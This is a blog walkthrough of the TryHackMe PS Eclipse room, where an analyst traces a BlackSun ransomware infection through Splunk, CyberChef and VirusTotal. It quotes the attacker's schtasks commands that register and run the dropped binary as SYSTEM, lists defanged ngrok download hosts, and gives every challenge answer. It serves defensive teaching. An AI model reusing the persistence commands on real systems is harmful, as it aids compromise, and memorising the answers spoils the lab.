In this post, we will walk-through the PS Eclipse room on TryHackMe. This room covers investigating a ransomware activity on a compromised machine.
We will go over what exactly is a ransomware for anyone that may not be familiar with the term. A Ransomware is a type of malware (malicious software) that encrypts files and keeps them inaccessible when activated until a ransom is paid. This is now vastly used by threat actors and criminal groups to demand a ransom from their victims in exchange for a decryption key. The computer itself may become locked, or the data on it might be encrypted, stolen or deleted rendering it unavailable to legitimate users. The attackers can also threaten to leak the data they steal and ask for another ransom, this is called a double extortion ransomware attack.
Tools used for this investigation are Splunk, VirusTotal, Hybrid Analysis, CyberChef.
Let us begin!
·
Challenge Scenario:
You are a SOC Analyst for an MSSP (Managed Security Service Provider) company called TryNotHackMe.
A customer sent an email asking for an analyst to investigate the events that occurred on Keegan’s machine on Monday, May 16th, 2022. The client noted that the machine is operational, but some files have a weird file extension. The client is worried that there was a ransomware attempt on Keegan’s device.
Your manager has tasked you to check the events in Splunk to determine what occurred in Keegan’s device.
Happy Hunting!
Challenge Questions
Q. A suspicious binary was downloaded to the endpoint. What was the name of the binary?
We will head to Splunk, select All time and insert * in the search query to retrieve all the data that has been ingested into Splunk.
We have over 17k events available to us
We also have 8 different source types for our investigation.
So, the first thing we’re looking for is a download of a suspicious binary. This can either be the ransomware itself or the executable that may later on retrieve the ransomware from a C2 server.
We will first select some extra fields we think will assist us with our investigation (you can skip this part).
We included fields like Source & Destination IP, Destination Port, File Path etc.
Let’s proceed by checking the DestinationPort field. We can see communication was done mostly on both port 443 and 80. So the binary was downloaded via either ports, let’s investigate further.
When we check the port 443, we can see just 3 executables are associated with the port which are MS Defender, OneDrive and an executable in the temp folder (we will take note of this).
We check port 80, we can see just one which is PowerShell, which is interesting.
Lets filter out PowerShell in the search, maybe that can help us find any suspicious commands and figure out why PowerShell was used on port 80.
Now, we will select the CommandLine filter on the left, and maybe we’ll find something.
Looks like an encoded command, that’s super suspicious.
So let’s run it through an Encoder & Decoder online tool called CyberChef and see if it can find something.
So we will first decode the text using the From Base64 operation.
It looks like they tried to obfuscate the text by putting symbols in between every letter. We will again decode the text using the Decode Text operation. We can see the output is now readable.
We see the command decoded! We found the name of the binary that was downloaded, it was stored in the temp directory.
Ans: OUTSTANDING_GUTTER.exe
Q. What is the address the binary was downloaded from? Add http:// to your answer & defang the URL.
In the previous image, we can see where the suspicious binary was downloaded from. We will have to defang the URL for safety reasons, so we don’t accidentally click on it.
Ans: hxxp[://]886e-181-215-214-32[.]ngrok[.]io
Q. What Windows executable was used to download the suspicious binary? Enter full path.
Windows PowerShell was used to retrieve the binary. To find the full path, you can go back to splunk and check the Image field.
Ans: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Q. What command was executed to configure the suspicious binary to run with elevated privileges?
So the question is asking for a command that was executed, which will allow the binary run with elevated privileges. We run the search with PowerShell once more, and we take a look at the CommandLine field. Let’s see the commands executed by PowerShell.
The first value is our answer. This command makes sure that the malicious executable runs as a scheduled task via when certain conditions are met :
schtasks.exe: Enables administrators to create, delete, query, change, run, and end scheduled tasks on a local or remote computer.
- /MO: Specifies the trigger condition for the task, in this case, the Event ID of 777.
- /RU: Specifies the user account under which the task will run, in this case, the SYSTEM account.
- /f: Forces the task to be created without prompting for confirmation.
We could have just gotten the answer from the decoded text, but it doesn’t have the full path of schtasks as shown in the CommandLine
Ans: “C:\Windows\system32\schtasks.exe” /Create /TN OUTSTANDING_GUTTER.exe /TR C:\Windows\Temp\COUTSTANDING_GUTTER.exe /SC ONEVENT /EC Application /MO *[System/EventID=777] /RU SYSTEM /f
Q. What permissions will the suspicious binary run as? What was the command to run the binary with elevated privileges? (Format: User + ; + CommandLine)
They give us the format of how they want the answer
User + ; + CommandLine
Let’s take a look at the CommandLine field again and see what we can find.
Now I will look in the second event from the dropdown menu of CommandLine
Remember that in the last command for #4 the task would run as the user SYSTEM
Upon research, you will find that the proper format for the privileged system account is
NT AUTHORITY\SYSTEM
This is the first part of our answer. Now we add the ; and the CommandLine command that we have chosen in the above image and that is our answer. The second command here will be our answer.
Ans: NT AUTHORITY\SYSTEM;”C:\Windows\system32\schtasks.exe” /Run /TN OUTSTANDING_GUTTER.exe
Q. The suspicious binary connected to a remote server. What address did it connect to? Add http:// to your answer & defang the URL.
So, it looks like the binary that was downloaded, reached out to a remote server after it was executed by the user. Let’s figure out what the server was. Let us go through the logs.
Since we know the binary, we will put in the search bar.
Upon Investigation, I found a URL that was similar to the one we had to defang in #2, under the field Queryname (this field shows the target URLs), add http and defang the url and that is your answer
Ans: hxxp[://]9030-181-215-214-32[.]ngrok[.]io
Q. A PowerShell script was downloaded to the same location as the suspicious binary. What was the name of the file?
A file as retrieved from the domain we identified in the previous question. It appears to be a PowerShell script. To find the file, we will search using the extension for PowerShell scripts i.e .ps1.
We will run the files we find through a table using the following search query.
* .ps1
| table TargetFilename
Where
- table: Takes a result set and places the specific fields into a tabular view
- TargetFilename: Name of the file that was created/downloaded
The one file that looks very suspicious is the script.ps1 file.
So, we can’t say for certain that this was the file that was retrieved just yet. We will upload and run the file across a couple threat hunting tools. We will get the hash of the file and upload it on both VirusTotal and Hybrid Analysis, these are tools that make use of multiple antivirus/anti-malware engines to analyze a file.
We will copy the SHA256 hash of the file and upload it
From our findings, we see multiple antivirus engines flagged the file as malicious and identified the file as a ransomware. So the script.ps1 file is definitely the answer.
Ans: script.ps1
Q. The malicious script was flagged as malicious. What do you think was the actual name of the malicious script?
We will go back to the online tools we used to identify the script’s name. Upon investigation, we discovered the actual name of the script is BlackSun.ps1
Ans: BlackSun.ps1
Q. A ransomware note was saved to disk, which can serve as an IOC. What is the full path to which the ransom note was saved?
So we know the the script is the ransomware. A ransomware note typically comes with the malware, and they are saved as text files. We can answer this by searching BlackSun (given we know the actual name of the ransomware) or just searching for text files using the .txt extension. Here, we will use the later
We will then look for the files under TargetFilename
Ans: C:\Users\keegan\Downloads\vasg6b0wmw029hd\BlackSun_README.txt
Q. The script saved an image file to disk to replace the user’s desktop wallpaper, which can also serve as an IOC. What is the full path of the image?
Similar to the search query for the previous question. We can answer this by searching BlackSun or just searching for image files using multiple file extensions e.g., JPEG/PNG.
We can see the image file created by the ransomware
Ans: C:\Users\Public\Pictures\blacksun.jpg
Summary
From our investigation, we can understand how the incident occurred. The threat actor initially compromised Keegan’s system likely via a phishing email attachment or malicious link and gained unauthorized access by exploiting an unpatched vulnerability. They then further executed a PowerShell command to download a malicious executable and scheduled it to run with elevated privileges to retrieve the BlackSun ransomware from a malicious URL. The downloaded malware went ahead to encrypt some files on the system and changed their file extensions, rendering them unavailable. There was also ransom note left by the threat actor, likely stating that some files are encrypted and cannot be opened without paying a ransom to get the decryption key. The note will also describe the method of payment.
To learn more about BlackSun ransomware you can check this page
Tips
Let us look at some measures that can be implemented to mitigate the risk of ransomware infection:
- Download software applications only from official stores and trusted pages
- Regularly update installed applications and deploy patches to fix system flaws/bugs
- Do not download attachments especially executable attachments from suspicious/unsolicited emails. Avoid clicking on links included in irrelevant emails received from unknown, suspicious addresses.
- Install and run advanced endpoint detection and response (EDR) solutions to enable timely identification and remediation of systems in the event of a breach.
- Maintain regular backup of important files
If you discover that your machine is infected with malware, disconnect the compromised machine from the network and scan your computer with legitimate antivirus software to eliminate possible malware infections.
Conclusion
The use of ransomware to extort money has been on the rise and several well-known organizations in various industries have already been compromised. It is crucial that proper measures be put in place to defend against such attacks.